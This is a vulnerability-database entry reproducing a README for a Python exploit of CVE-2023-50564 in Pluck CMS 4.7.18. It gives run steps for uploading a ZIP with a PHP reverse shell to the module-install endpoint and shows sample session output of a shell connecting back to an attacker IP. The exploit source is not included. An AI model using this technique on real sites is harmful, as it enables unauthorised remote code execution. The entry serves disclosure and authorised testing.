关联漏洞
标题:
Pluck 安全漏洞
(CVE-2023-50564)
描述:Pluck是一套使用PHP语言开发的内容管理系统(CMS)。 Pluck v4.7.18版本存在安全漏洞,该漏洞源于组件 /inc/modules_install.php 中存在任意文件上传漏洞,允许攻击者通过上传精心设计的 ZIP 文件来执行任意代码。
介绍
# CVE-2023-50564 - Pluck CMS v4.7.18 Exploit
## Overview
This script exploits an authenticated arbitrary file upload vulnerability in **Pluck CMS v4.7.18** (CVE-2023-50564). By leveraging this vulnerability, an authenticated attacker can upload a malicious PHP file, enabling the execution of arbitrary code (in this case, a reverse shell).
### Exploit Details
- **CVE ID**: CVE-2023-50564
- **Affected Version**: Pluck CMS v4.7.18
- **Type**: Authenticated Arbitrary File Upload
- **Impact**: Remote Code Execution (RCE)
The vulnerability exists in the `/admin.php?action=installmodule` endpoint, which allows an authenticated user to upload a ZIP file containing arbitrary files. By uploading a malicious PHP file, this exploit establishes a reverse shell back to the attacker.
## Requirements
- **Python 3.x**
- **requests** module: `pip install requests`
- **requests-toolbelt** module: `pip install requests-toolbelt`
This script also requires a valid login for the Pluck CMS instance, including the target's URL and password.
## Exploit Features
- **Reverse Shell**: The exploit uploads a PHP reverse shell to the target and connects back to the attacker's machine.
- **Interactive Command Execution**: Once the reverse shell is established, commands can be executed interactively on the target.
- **Password Prompt Detection**: The exploit detects password prompts (e.g., `su`, `sudo -l`) and allows the user to provide input manually.
## Usage
### Steps to Run the Exploit
1. **Clone the Repository**:
```bash
git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
```
2. **Install Required Python Packages**: Make sure the required packages are installed:
```bash
pip install requests requests-toolbelt
```
3. **Run the Exploit**: The script requires four inputs: target URL, the CMS password, your IP address (for the reverse shell), and the port on which you want to listen.
Run the exploit using Python:
```bash
python3 exploit.py
````
5. **Provide Input When Prompted**:
- Enter the target URL (e.g., example.com).
- Enter the password for authentication on the CMS.
- Enter your IP address for the reverse shell connection.
- Enter the port for listening to the reverse shell.
5. **Interactive Shell**: Once the reverse shell is established, you'll be presented with a Shell> prompt to interact with the target system.
**Example:**
```bash
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
```
## Exploit Breakdown
- **Authentication**: The script logs into the CMS using the provided credentials.
- **File Upload**: It creates a ZIP archive containing a PHP reverse shell and uploads it to the vulnerable endpoint (/admin.php?action=installmodule).
- **Reverse Shell**: The script triggers the uploaded PHP file, establishing a reverse shell connection back to the attacker's machine.
## CVE Details
- **CVE ID**: CVE-2023-50564
- **Vulnerable Endpoint**: /admin.php?action=installmodule
- **Vulnerable Version**: Pluck CMS v4.7.18
- **Type**: Authenticated Arbitrary File Upload
## Disclaimer
This script is intended for educational purposes and ethical hacking. It should only be used in environments where you have explicit permission to test. The author is not responsible for any misuse of this tool.
## License
This project is licensed under the MIT License - see [MIT License](https://opensource.org/licenses/MIT) for details.
## Contributing
Feel free to fork the repository and submit pull requests. For any issues or feature requests, please open an issue on GitHub.
文件快照
[4.0K] /data/pocs/e9bf5d43bda76c6baba6e31a5eeed0a8db2feb31
├── [7.9K] exploit.py
└── [4.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。